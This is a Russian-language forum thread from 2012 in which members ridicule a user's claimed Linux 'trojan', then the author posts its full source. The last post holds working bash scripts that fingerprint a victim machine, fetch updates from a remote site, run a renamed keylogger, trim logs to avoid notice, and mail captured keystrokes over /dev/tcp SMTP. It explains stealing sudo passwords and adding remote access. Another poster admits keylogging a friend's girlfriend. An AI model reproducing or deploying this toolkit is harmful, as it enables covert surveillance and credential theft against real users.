Обнаружен первый в истории троянец для Linux.

Apollo 11 · 12-10-12 00:17:34

selenscy пишет:

Я всё уссываюсь с вас, как вы тут мне всё норовите листинг с комментами и прочей физкультурой вам представить

А ты не юли, дорогой. Дело не в том, чтобы ты нам тут выкладывал красивые логи, которые ты показываешь. Дело в том, чтобы ты объяснил, как ты получаешь их такими красивыми. Ручками набиваешь?
Ты даёшь разрешение на передачу твоих скриптов ikkunan salvataja?

Rorschach пишет:

Я такие вот херотени ставил на комп подруги одного знакомого, чтобы переписку и пароли палить. Еще и кеш очищал, чтобы пароли не висели в автозаполнении.

О_о! Поверь, тут всё куда примитивней lol Да и не работает нихрена lol

selenscy · 12-10-12 00:18:12

usual_user пишет:

это после того, что Вы пишите обо мне я должен Вам верить? Вы не про мои финансы не знаете, ни возраст мой определить не в состоянии. Так кто из нас трямкает?

А хули же хуйню такую пишешь, если даже не знаешь о чём речь? Возьми и поставь себе логгер хоть из сорцов, да проверь через какое то время логи smile

usual_user · 12-10-12 00:20:54

selenscy пишет:

А хули же хуйню такую пишешь, если даже не знаешь о чём речь? Возьми и поставь себе логгер хоть из сорцов, да проверь через какое то время логи

Зеркалю, мил человек

selenscy · 12-10-12 00:30:52

Apollo 11 пишет:

А ты не юли, дорогой. Дело не в том, чтобы ты нам тут выкладывал красивые логи, которые ты показываешь. Дело в том, чтобы ты объяснил, как ты получаешь их такими красивыми. Ручками набиваешь?
Ты даёшь разрешение на передачу твоих скриптов ikkunan salvataja?

Во первых я уже убедился в вашем "профессинализме" сполна, когда вы аж комменты требуете к примитивному в общем то скрипту. Я уж даже и не знаю, какие вы "программисты". Во вторых я тебе уже отписался, что светиться у мну желания нет. Так что попрошу какие то приличия соблюдать. Хотя самое криминальное я уже потёр, однако нуивонах. Вспомни ка там выше пост wink
И не надо тут петросянить убого на людях, в личке, один на один, ты попристойнее себя ведёшь гораздо wink

Apollo 11 · 12-10-12 00:36:32

selenscy пишет:

Во первых я уже убедился в вашем "профессинализме" сполна, когда вы аж комменты требуете к примитивному в общем то скрипту.

Ну как же не спрашивать, если самого вкусного-то в скрипте и нет? А ты что здесь, что в личке отвечаешь: идите на х*й, я не знаю, почему оно мне шлёт такие логи? Либо ты что-то самое интересное припрятал, либо... (думаю, ты и сам догадался, каким словом я хотел, но постеснялся закончить фразу).

selenscy пишет:

Во вторых я тебе уже отписался, что светиться у мну желания нет. Так что попрошу какие то приличия соблюдать.

Дык соблюдаю. Разве нет? Я и из своей лички твой скрипт удалю, когда всё прояснится, и никому его передавать не буду без твоего разрешения.

selenscy пишет:

И не надо тут петросянить убого на людях, в личке, один на один, ты попристойнее себя ведёшь гораздо

selency, в личке я тебе задаю те же самые вопросы. Почему ты в личке считаешь их пристойными, а здесь — петросянством?

Добавлено спустя 03 мин 01 с:
Кстати, то, что ты можешь с помощью этого скрипта спам рассылать, я не отрицаю (хотя ты и припрятал модуль спама). Но вот по поводу паролей, логинов и явок попрошу тебя, всё-таки, прояснить ситуацию. Без петросянства.

selenscy · 12-10-12 00:46:07

Apollo 11 пишет:

(хотя ты и припрятал модуль спама)

Хы-хы-хы!

Это обыкновенный текстовый файл и в conf меняешь keys на spam и адреса почтовых ящиков соответственно smile Что же у вас с логикой то так хуёво?

Добавлено спустя 04 мин 50 с:

Apollo 11 пишет:

ты что-то самое интересное припрятал, либо... (думаю, ты и сам догадался, каким словом я хотел, но постеснялся закончить фразу).

Есть там нюансик wink Но действительно специалист поймёт в чём дело smile Дерзай!

Это не сложно smile

Apollo 11 · 12-10-12 00:52:12

selenscy пишет:

Что же у вас с логикой то так хуёво?

Да с логикой-то у нас всё нормально, потому и вопросы задаём. Сравниваем свой лог-файл с теми, что ты показываешь и удивляемся. В скрипте ты кодировку не задаёшь, — я тоже не задавал. То, что получилось, выслал тебе. Ты расшифровал мой лог-файл? Получил пароль от СЛОРа?

Добавлено спустя 01 мин 22 с:

selenscy пишет:

Есть там нюансик wink Но действительно специалист поймёт в чём дело smile Дерзай!
Это не сложно

Дык, со спамом-то, как раз, ничего сложного, да. Для этого, кстати, вообще root не нужен. Так что не хвастайся раньше времени.

selenscy · 12-10-12 01:02:03

Apollo 11 пишет:

Ты расшифровал мой лог-файл? Получил пароль от СЛОРа?

Даже не старался! Могу сказать, что далеко не всё совершенно в этом мире, в том числе и логгеры smile Попробуй на другой клавиатуре. Да к тому же, как можно заметить там везде уебанта smile

Apollo 11 · 12-10-12 03:08:46

selenscy пишет:

Могу сказать, что далеко не всё совершенно в этом мире, в том числе и логгеры

Одно дело, когда они несовершенны, другое дело, когда ты не можешь пояснить, почему твой пользователь ничего больше не делает за компьютером, кроме как вводить пароль sudo, вбивать (опять подчёркиваю: почему ручками) адреса электронной почты, фкантактика и т.д. (в то время, как люди пользуются закладками), логины и пароли. Какие-то у тебя логи академические девственно чистые. Пользователь у тебя не нажимает хоткеев, не пишет писем, не гадит на слорах, не чмаффкается во фкантактиках; он исключительно серьёзен и суров: только пароли, явки и больше ничего. Подсказываю: ты можешь ответить, что ты чистишь логи, перед тем как их нам сюда выложить lol

selenscy пишет:

Попробуй на другой клавиатуре.

А какая разница? На каком уровне работает кейлоггер?

selenscy пишет:

Да к тому же, как можно заметить там везде уебанта

Да там многое можно заметить lol Бубунта в виртуалке у сурового вендузятнега lol

Director cemetery · 12-10-12 03:49:11

-Троянец обнаружен изучен, приручен. Отдам в добрые руки. Rorschach ⇓

Отредактировано Director cemetery (12-10-12 15:38:36)

Rorschach · 12-10-12 09:21:58

Director cemetery, Эмм, пробежался по темам. Вам ничего не говорит выражение - "В каждой жопе затычка"?

Apollo 11 · 12-10-12 11:41:02

Итак, думаю, можно подвести итог.
"Троян" by selency — наколенная поделка, не способная на что-то мало-мальски серьёзное. Максимум, что она может (при существенной доработке напильником, ага): рассылать спам. Но для этого не нужен root. Использование же root'а в поделке для рассылки спама означает стрелять из пушки по воробьям, да при этом ещё и мимо.
В лучшем случае, что может получать selency благодаря своей поделке — это длиннющие простыни логов кейлоггера, из которых выудить пароль он просто не в состоянии. Когда ему предложили фрагмент такого лога, выяснилось, что у меня неправильная клавиатура и неправильный линупс. Если бы в скрипте был заложен (к примеру) запуск кейлоггера по событию (пусть даже через тот же примитивный if, который selency использует в скрипте), например, при запуске браузера или затребовании пароля sudo (хотя последнее было бы немного сложнее реализовать) и остановка кейлоггера с отправкой e-mail при закрытии браузера, нажатии Enter после ввода пароля sudo и т.д., то я ещё хоть как-то мог бы объяснить чЮдесТно девственные логи, которые нам выкладывал selency в качестве подтверждения якобы поимения им всех линупсов в на планете. Но ничего этого нет. В скрипте есть использование du для очистки лога, странные команды запуска кейлоггера, но никаких событий я там не вижу. В результате "троян" by selency должен был просто заспамить его почтовый ящик маловразумительными длиннющими логами, для получения информации из которых потребуется специальная квалификация, которая, как мы тоже выяснили, у selency отсутствует.
Попутно мы выяснили множество странных, необъяснимых (поскольку сам selency их объяснить не смог, ага) деталей: юзвери "поражённых злобным трояном" машин ничего не делают за компьютером, кроме ввода паролей и логинов. Ах, нет, они ещё руками вбивают в окошко браузера адреса vk.com, yandex.ru и т.д., вместо того, чтобы использовать закладки. И, что не менее поразительно, они все — вендузятнеги, использующие линупс в виртуалке.
В связи с этим, резюмирую: как я и предполагал с самого начала, selency поимел сам себя, а не линуксоидов. Те сказочные логи, что он здесь выкладывал в качестве доказательства, не могли быть получены с помощью его "трояна". И, кстати, selency, тебе скрипт, случайно, не wr224 писáл? lol А то стиль написания в точности его: всё реализовать через ж*пу, да ещё так, что оно нихрена не работает. Впрочем, это всего лишь предположение.
Засим я для себя закрываю эту тему. Поскольку у меня своей работы сейчас навалом и анализировать маловменяемые наколенные поделки, да ещё и получать постоянные обвинения в безграмотности, мне не интересно. Лично я для себя уже всё выяснил. Все сказки selency о том, что "линупс раздвинул ноги и шлёт ему логи, пароли, явки, бабки и прочая", оказались банальнейшим враньём. С чем я selency и поздравляю.
P.S. selency, удали сам свой скрипт из моей лички. У меня нет на это прав. И e-mail удали с паролем.

Okkamas Buddy · 12-10-12 11:46:29

Apollo 11 пишет:

это длиннющие простыни логов кейлоггера, из которых выудить пароль он просто не в состоянии

|grep qwerty
|grep 123456

Не?
smile

Apollo 11 · 12-10-12 11:49:02

Okkamas Buddy пишет:

|grep qwerty
|grep 123456
Не?
smile

smile :up:

Rector · 12-10-12 17:00:15

Apollo 11, аплодирую стоя! Ловко ты этого "заправщика картриджей" раскатал в блин! Респект!
--------
Okkamas Buddy, не утрируй. Пароль может выглядеть и так - gjhtrtgksd`nen.ubpctkfrerjtdf. Так что, кусачки не помогут -)

usual_user · 12-10-12 18:09:21

Rector, я Бы-еще По-реке Плывэт-утюг Из села Кукоева 403045 вот так добавил. Ну, а то, что в логи кейлогеру гадить можно. У меня на ноуте постоянно какая-то клавиша гадит)))

▼Скрытый текст

типа такого.

Rector · 12-10-12 18:12:44

usual_user, а что за setkeycodes e00d? Выяснял?

Добавлено спустя 02 мин 22 с:
e00d - какая клавиша на клавиатуре соответствует этому коду? Может у тебя просто печенька крошка с бороды в клаву упала? -)

usual_user · 12-10-12 18:15:20

Rector, особо нет. Лечится обнулением биоса, а появляется сразу после надписи ac adapter cannot be ... вобщем определить он его не может.

Rector пишет:

крошка с бороды в клаву упала? -)

Клава заменена)))))) Чувствую батарейку менять пора хоть оно и не связано. mikebeach.org/2011/04/24/kernel-atkbd-c … -on-linux/про это написано и решение есть, но как бы не мешает.

Отредактировано usual_user (12-10-12 18:33:16)

Rector · 12-10-12 18:24:34

usual_user пишет:

Лечится обнулением биоса

serio0, может отключить в биосе COM- порты. Как вариант?

Добавлено спустя 01 мин 59 с:
usual_user, ссылка не рабочая.
UPD По ссылке, просто костыль.

Отредактировано Rector (12-10-12 18:57:43)

usual_user · 12-10-12 19:18:23

Rector, дк я написал когда оно появляется и где я это могу заметить пользуясь линукс. Последняя дата когда было замечано 6 октября. Лечится тоже просто, спасибо одному из участников этого форума за подсказку.

Rector · 12-10-12 19:21:13

usual_user, решил, да решил. Хорошо.

Linups_Troolvalds · 12-10-12 19:41:17

К ногам selenscy пала Троя,
Скачав скрипты из-под коня.
И аплодируем мы стоя,
А он, бубенчиком звеня,
Весь линукс в мире заразил
И Марка Шаттлворта в космос
скриптом коварным запусил.

Okkamas Buddy · 12-10-12 20:17:36

Вернувшись, Шаттлворт заметил:
"Какого хрена, не пойму?!"
По-новой, грустно, диск разметил.
И переставил Убунту.

Director cemetery · 12-10-12 21:29:42

selenscy, смею заметить ..это слава!

selenscy · 13-10-12 13:19:18

Apollo 11 пишет:

Итак, думаю, можно подвести итог.

Итог, в том, что Аполлоша оказался обыкновенным мудаком, а отнюдь не списиалистом, о котором он себя мнит.

Напоминаю Мудаку, с большой буквы, Аполлоше Слорскому, что изначально было сказано, что этот скрипт сделан на коленке, о чём сказано в предыдущих постах, с целью показать, что поделие дыряво как дуршлаг. Очень меня посмешили идиотские вопросы Аполлоши-мудака-ниипацца-списиалиста что и как делает отдельная строка скрипта, когда этот Мудак-списиалист попутал функцию отправки почты с кейлогером big_smile
Это просто пиздец!!!
Что ещё смешнее так это то, как списиалист обсирает logkeys, запиленый истинными пенгванутыми и до сих пор хранящийся в лепрозориях в актуальном состоянии cool Вот и суди после этого о списиалистах, способными только выдавать тирады о паганой винде и божественном поделии lol Предназначение сего скрипта, действительно сбацаного на коленке, всего лишь оправить некую инфу на определённый адрес, а уж функционала можно навесить выше крыши, в зависимости от фантазии, вплоть до локеров.

В общем очень меня порадовал Мудак с большой буквы, мнящий себя списиалистом, давно так не ржал cool Думаю, что таких в среде подельщиков вагон и маленькая тележка, вкупе с жертвой локалхоста smile

Ну а теперь сам скрипт, вернее алгоритм , которым так занятно я потроллил и повеселился на Мудаком-списиалистом, переспрашивающим меня насчёт каждой строчки в личке, думая по его тупости, что его представили списиалистом wink Разберём его вкратце.

sys Собирает инфу о компе жертвы и пишет в файлик header

#!/bin/bash
ip=`wget -O - -q icanhazip.com`
name=`hostname`
sys=`cat /etc/issue.net`
sshd=`ps -A|grep sshd|wc -l`
proc=`cat /proc/cpuinfo | grep name`
mem=`cat /proc/meminfo | grep MemTotal`
if [ $sshd -eq 0 ] ; then 
    sshd="SSH off"
else
    sshd="SSH on"
fi
echo $ip / $name / $sys / $sshd / $mem / $proc > /место где храним скрипт/header
exit 0[/quote]

engine Собственно сам файл, который проверяет запущен ли логгер, обрезает его до нужной величины, чтобы не палиться, запускает логгер и файл определения конфигурации с mailsender. Собственно все файлики можно обьединить в один общий файл, однако тут у Мудака-списиалиста с большой буквы, упала башня от обилия незнакомых букавак cool

#!/bin/bash

logk=`ps -A|grep logk|wc -l`
if [[ "$logk" -ge "1" ]] ; then
    /место где храним скрипт/logk -k
fi
wget -q -t 1 -N -nd http://адрес сайта/conf -P /место где храним скрипт/
wget -q -t 1 -N -nd http://адрес сайта/spam -P /место где храним скрипт/
wget -q -t 1 -N -nd http://адрес сайта/engine -P /место где храним скрипт/
wget -q -t 1 -N -nd http://адрес сайта/sys -P /место где храним скрипт/
chmod +x /место где храним скрипт/sys
chmod +x /место где храним скрипт/engine
/место где храним скрипт/./sys
/место где храним скрипт/./mailsend 
size=`du -b /место где храним скрипт/keys | awk '{print $1}'`
if [[ "$size" -ge "8192" ]] ; then
    rm -f /место где храним скрипт/keys
    /место где храним скрипт/logk -s -o /место где храним скрипт/keys --no-func-keys 
    exit 0
fi
/место где храним скрипт/logk -s -o /место где храним скрипт/keys --no-func-keys
exit 0

mailsender Думаю, что всё понятно.

#!/bin/bash

  e_from=`cat /место где храним скрипт/conf | awk '{if (NR==1) {print $1}}'`
  e_to=`cat /место где храним скрипт/conf | awk '{if (NR==2) {print $1}}'`
  header=`cat /место где храним скрипт/conf | awk '{if (NR==3) {print $1}}'`
  body=`cat /место где храним скрипт/conf | awk '{if (NR==4) {print $1}}'`
  e_server=`cat /место где храним скрипт/conf | awk '{if (NR==5) {print $1}}'`
  e_login=`cat /место где храним скрипт/conf | awk '{if (NR==6) {print $1}}'`
  e_pass=`cat /место где храним скрипт/conf | awk '{if (NR==7) {print $1}}'`
  subject=`cat /место где храним скрипт/conf | awk '{if (NR==8) {print $1}}'`
  e_port=`cat /место где храним скрипт/conf | awk '{if (NR==9) {print $1}}'`

exec 9<>/dev/tcp/$e_server/$e_port
echo "HELO me" >&9
 read -r temp <&9
  echo "auth login" >&9
 read -r temp <&9
echo $e_login >&9
 read -r temp <&9
  echo $e_pass >&9
 read -r temp <&9
echo "Mail From: $e_from" >&9
 read -r temp <&9
echo "Rcpt To: $e_to" >&9
 read -r temp <&9
echo "Data" >&9
 read -r temp <&9
  cat $header >&9
echo "Subject: "$subject >&9
echo "From: "$e_from >&9
echo "To: "$e_to >&9
echo >&9
cat $body >&9
echo "." >&9
read -r temp <&9
echo "quit" >&9
read -r temp <&9
9>&-
9<&-
exit 0

conf

Ящики должны быть в одном домене. Из логики работы mailsender видно, как он перебирает строки и вынимает из conf адреса, логины, пароли, порты и прочее для своей работы. У Мудака-списиалиста с большой быквы здесь случился когнитивный диссонанс, после чего он обосрался знатно. Заметьте, что conf полностью не использован и парли шифрованы, отчего и почему думаю разберётесь, это не сложно, кодовое слово base64 wink

почтовый ящик, от имени которого отправляют письма@mail.ru
почтовый ящик кому шлём@mail.ru
/место где храним скрипт/header
/место где храним скрипт/keys
smtp.mail.ru
dTg4MDc=
b20zN2twMVp6SA==
Subject
25
false
0


end configuration

logk это просто переименованый logkeys wink От которого у Мудака-списиалиста случился второй когнитивный диссонанс и срыв шаблона lol Можно переименовать в apollosha-mudak wink и будет работать cool Повторяю, что это logkeys лежит в лепрозориях и сделан совсем не selenscy по жопе эль и антилопе гну smile Очень легко определяются такие комбинации как

Logging started ...

2012-10-05 23:37:33+0400 > sudo mc
2012-10-05 23:38:01+0400 > master

Пароль суперпользователя в кармане smile Если запущен sshd то думаю всё ясно wink Можно подкинуть с нашего сайта и какую нибудь софтинку для организации удалённого доступа smile Троян ведь уже запущен wink

В общем дело обстоит так. В сети делается некий сайт на котором располагаем conf, engine, sys, хотя можно и не размещать wink Сделано это для того, чтобы удалённо и централизовано можно было управлять дырявыми поделиями smile В общем Мудак-списиалист показал здесь полную свою тупость и несостоятельность в полной красе. С чем его все мы и поздравляем smile

За сим прощаюсь окончательно. Всем пользователям Windows удачи и процветания, а также профессионального роста. Чтобы не стали Мудаками-списиалистами как Аполлоша Слорский smile

Отредактировано selenscy (13-10-12 15:28:35)

Форум StopLinux

Объявление

#951 12-10-12 00:17:34

Re: Обнаружен первый в истории троянец для Linux.

#952 12-10-12 00:18:12

Re: Обнаружен первый в истории троянец для Linux.

#953 12-10-12 00:20:54

Re: Обнаружен первый в истории троянец для Linux.

#954 12-10-12 00:30:52

Re: Обнаружен первый в истории троянец для Linux.

#955 12-10-12 00:36:32

Re: Обнаружен первый в истории троянец для Linux.

#956 12-10-12 00:46:07

Re: Обнаружен первый в истории троянец для Linux.

#957 12-10-12 00:52:12

Re: Обнаружен первый в истории троянец для Linux.

#958 12-10-12 01:02:03

Re: Обнаружен первый в истории троянец для Linux.

#959 12-10-12 03:08:46

Re: Обнаружен первый в истории троянец для Linux.

#960 12-10-12 03:49:11

Re: Обнаружен первый в истории троянец для Linux.

#961 12-10-12 09:21:58

Re: Обнаружен первый в истории троянец для Linux.

#962 12-10-12 11:41:02

Re: Обнаружен первый в истории троянец для Linux.

#963 12-10-12 11:46:29

Re: Обнаружен первый в истории троянец для Linux.

#964 12-10-12 11:49:02

Re: Обнаружен первый в истории троянец для Linux.

#965 12-10-12 17:00:15

Re: Обнаружен первый в истории троянец для Linux.

#966 12-10-12 18:09:21

Re: Обнаружен первый в истории троянец для Linux.

#967 12-10-12 18:12:44

Re: Обнаружен первый в истории троянец для Linux.

#968 12-10-12 18:15:20

Re: Обнаружен первый в истории троянец для Linux.

#969 12-10-12 18:24:34

Re: Обнаружен первый в истории троянец для Linux.

#970 12-10-12 19:18:23

Re: Обнаружен первый в истории троянец для Linux.

#971 12-10-12 19:21:13

Re: Обнаружен первый в истории троянец для Linux.

#972 12-10-12 19:41:17

Re: Обнаружен первый в истории троянец для Linux.

#973 12-10-12 20:17:36

Re: Обнаружен первый в истории троянец для Linux.

#974 12-10-12 21:29:42

Re: Обнаружен первый в истории троянец для Linux.

#975 13-10-12 13:19:18

Re: Обнаружен первый в истории троянец для Linux.

Подвал форума